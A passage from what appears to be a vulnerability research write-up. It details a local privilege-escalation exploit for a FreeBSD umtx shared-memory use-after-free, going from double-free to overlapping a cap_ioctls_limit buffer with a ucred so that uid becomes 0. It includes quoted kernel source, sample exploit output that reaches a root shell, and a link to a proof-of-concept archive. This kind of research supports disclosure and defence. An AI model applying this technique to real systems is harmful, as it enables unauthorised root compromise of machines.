Recall that the vulnerability gives as a file descriptor with a dangling shmfd pointer. If we now do another UMTX_SHM_CREAT operation then we will create a new umtx_shm_reg and a new shmfd:

umtx_shm_reg has a refcount of 1
shmfd has a refcount of 2
Our dangling shmfd will point to the same address as this new shmfd

The shmfd has a refcount of 2 because UMTX_SHM_CREAT returns us a file descriptor. If we close that file descriptor, the shmfd will now have a refcount of 1.

We can now call close on our vulnerable file descriptor. That will call shm_close, which will call shm_drop on the dangling shmfd. Since the dangling shmfd now aliases the new shmfd we just created, this will free the new shmfd while keeping the umtx_shm_reg in the registry.

Now the umtx_shm_reg entry holds a dangling shmfd pointer.

Next we perform a UMTX_SHM_LOOKUP operation. Here's the relevant part of umtx_shm again:

    static int
    umtx_shm(struct thread *td, void *addr, u_int flags)
    {
            struct umtx_key key;
            struct umtx_shm_reg *reg;
            struct file *fp;
            int error, fd;
    ...
[2]                 reg = umtx_shm_find_reg(&key);
    ...
                            error = falloc_caps(td, &fp, &fd, O_CLOEXEC, NULL);
                    if (error == 0) {
[3]                         shm_hold(reg->ushm_obj);
                            finit(fp, FFLAGS(O_RDWR), DTYPE_SHM, reg->ushm_obj,
                                &shm_ops);
                            td->td_retval[0] = fd;
                            fdrop(fp, td);
                    }
            }
            umtx_shm_unref_reg(reg, false);
            return (error);
    }

At [2], the kernel will find the umtx_shm_reg with the dangling shmfd and prepare a file descriptor for us. In setting up this file descriptor, it will call shm_hold on the freed data [3], bumping the refcount back from 0 to 1 again.

Finally, if we close the resulting file descriptor right away, we will reach shm_drop again, but this time with all of the legitimate kernel pointers still in place (since the freed memory wasn't zeroed).

We have now performed a double-free.

With this done, now is a good time to remove the umtx_shm_reg entry since it still holds a dangling pointer to this double-freed memory. It's safe to perform a UMTX_SHM_DESTROY at this point since the shmfd refcount has returned to zero: in cleaning up the umtx_shm_reg, the refcount will drop again, but to -1 this time — which is safe.

Now we are in a stable situation with a double-freed malloc256 element since the size of a shmfd is 208 bytes.

What this means is that the next 2 allocations from the malloc256 bucket will return the same virtual address. By choosing which two allocations come from there next, we can choose two objects to overlap in a useful way.

Aliasing a `cap_ioctls_limit` Array with `ucred`

The cap_ioctls_limit syscall will be very useful here. The purpose of the syscall is to allow userland to specify an allowlist of permissible ioctl codes for an open file descriptor:

    int
    sys_cap_ioctls_limit(struct thread *td, struct cap_ioctls_limit_args *uap)
    {
            u_long *cmds;
            size_t ncmds;
            int error;
    
            ncmds = uap->ncmds;
    
            if (ncmds > IOCTLS_MAX_COUNT)
                    return (EINVAL);
    
            if (ncmds == 0) {
                    cmds = NULL;
            } else {
[1]                 cmds = malloc(sizeof(cmds[0]) * ncmds, M_FILECAPS, M_WAITOK);
[2]                 error = copyin(uap->cmds, cmds, sizeof(cmds[0]) * ncmds);
                    if (error != 0) {
                            free(cmds, M_FILECAPS);
                            return (error);
                    }
            }
    
[3]         return (kern_cap_ioctls_limit(td, uap->fd, cmds, ncmds));
    }

We can see the way this works is to malloc a user-controlled size [1], fill it with user-controlled content [2] and attach it to a file descriptor [3].

By calling cap_ioctls_limit with a zero length buffer, we cause the kernel to free any previously-attached ioctl limit buffer.

With an ioctl limit buffer in place, we can even read the contents of it back with the cap_ioctls_get syscall.

This provides us with:

The ability to allocate from a range of malloc buckets.
The ability to fill that allocation with arbitrary data.
The ability to read the contents of the buffer back.
The ability to free that buffer whenever we want to.

This is an extremely powerful mechanism for controlling use-after-frees.

Armed with this knowledge, we will use an ioctl limit buffer as one of our allocations out of the double-freed address. Whichever other object we choose as the other allocation for the double-freed address, we will now be able to read the content through cap_ioctls_get and even free/replace it with calls to cap_ioctls_limit.

Looking at the size of a ucred credential structure, this seems like a perfect candidate to alias since they will be allocated from the same bucket as shmfd came from (and hence where our double-free is set up):

(lldb) p sizeof(struct shmfd)
(unsigned long) $0 = 208
(lldb) p sizeof(struct ucred)
(unsigned long) $1 = 256

With our double freed element in place, the plan is then:

Allocate once with cap_ioctls_limit.
Allocate again with a ucred by calling setuid(getuid()) (this is allowed regardless of privilege and results in a new ucred allocation).
Read the ucred structure through cap_ioctls_get.
Fix up the cr_uid to be 0 and also increase the cr_ref refcount.
Free the ioctl buffer with cap_ioctls_limit(NULL).
Allocate that buffer back again with cap_ioctls_limit(&cred).

The net effect of this is that we've changed our process' credential:

cr_uid is now 0, so we've become root.
cr_ref has increased — which will be explained now.

Stopping here isn't enough because we're in a dangerous position: closing the file descriptor associated with the ioctl limit buffer will free our process' credential, ultimately leading to a panic. We need to transition to a stable state.

Since we're now root according to the kernel, we're free to allocate ourselves a better credential: we can call setresuid(0, 0, 0);.

In doing this, the kernel will allocate a new ucred and drop the refcount on our previous one. Since we increased the cr_ref as part of our fix-up, this will prevent that ucred from being freed. Our process will now transition to the new full-root credential and away from the double-freed memory slot.

Finally, because the cr_ref didn't reach zero, our file descriptor's ioctl limit buffer holds the only reference to the double-freed slot — it's no longer double-freed and so we've restored stability.

We can now call setresgid(0, 0, 0); to fully transition to a pure root credential, feel free to close the ioctl limit file descriptor and simply drop to a root shell.

Reference Implementation

My reference implementation of the exploit discussed here works in the way described at the end of the previous section:

We leverage the vulnerability to acquire a file descriptor with a dangling shmfd pointer.
We create/destroy another SHM through UMTX_OP_SHM to create a double-free.
We leverage the double-free to alias a cap_ioctls_limit buffer with a ucred struct.
We use cap_ioctls_get and cap_ioctls_limit again to read/write the ucred in place.
We transition to a full root credential and close any resources.
Finally, we drop to /bin/sh -i as root.

Sample output running against a 13.2-RELEASE kernel that I happen to have:

user@freebsd:~/umtx $ uname -a
FreeBSD freebsd 13.2-RELEASE FreeBSD 13.2-RELEASE releng/13.2-n254617-525ecfdad597 GENERIC amd64
user@freebsd:~/umtx $ make && ./umtx
cc  -Isrc -c src/kalloc.c -o src/kalloc.o
cc  -Isrc -c src/main.c -o src/main.o
cc  -Isrc -c src/uaf.c -o src/uaf.o
cc  -Isrc -c src/util.c -o src/util.o
cc -Isrc -pthread -o umtx src/kalloc.o  src/main.o  src/uaf.o  src/util.o
[+] racing to create dangling shmfd...
[+] success!
[+] creating umtx_shm_reg with dangling shmfd
[+] doing double-free
[+] allocating placeholder into double slot
[+] allocating cred into double slot
[+] read cred with uid=1001:
0c 4e 1d 81 ff ff ff ff  00 00 03 01 00 00 00 00 
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 
02 00 00 00 02 00 00 00  ff ff ff ff 00 00 00 00 
00 00 00 00 00 00 00 00  04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00  e9 03 00 00 e9 03 00 00 
e9 03 00 00 02 00 00 00  e9 03 00 00 e9 03 00 00 
00 38 31 4c 00 f8 ff ff  00 38 31 4c 00 f8 ff ff 
50 70 90 81 ff ff ff ff  c0 28 07 03 00 f8 ff ff 
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 
bc 10 17 68 00 f8 ff ff  10 00 00 00 e9 03 00 00 
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 
[+] fixing up and replacing
[+] attempting to secure creds
[+] uid=0, gid=0
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# whoami
root
#

Stability

Empirical testing shows that the probability of failing and triggering a kernel panic largely depends on how busy the kernel heap is while triggering the race condition. This is to be expected, since assumptions are made about which objects will be dispensed from the heap at critical points.

The reference implementation of the exploit was adjusted to improve stability in this way: a first cut constantly created and reaped new threads (for Thread A, Thread B and Thread C) in a loop, but this resulted in fairly common panics.

Adjusting the exploit to use primitive synchronisation between the threads — thereby avoiding auxiliary use of the heap — has proven to stabilise exploitation.

I have not yet observed any panics as a result of this refactoring.

PoC Archive

Download here.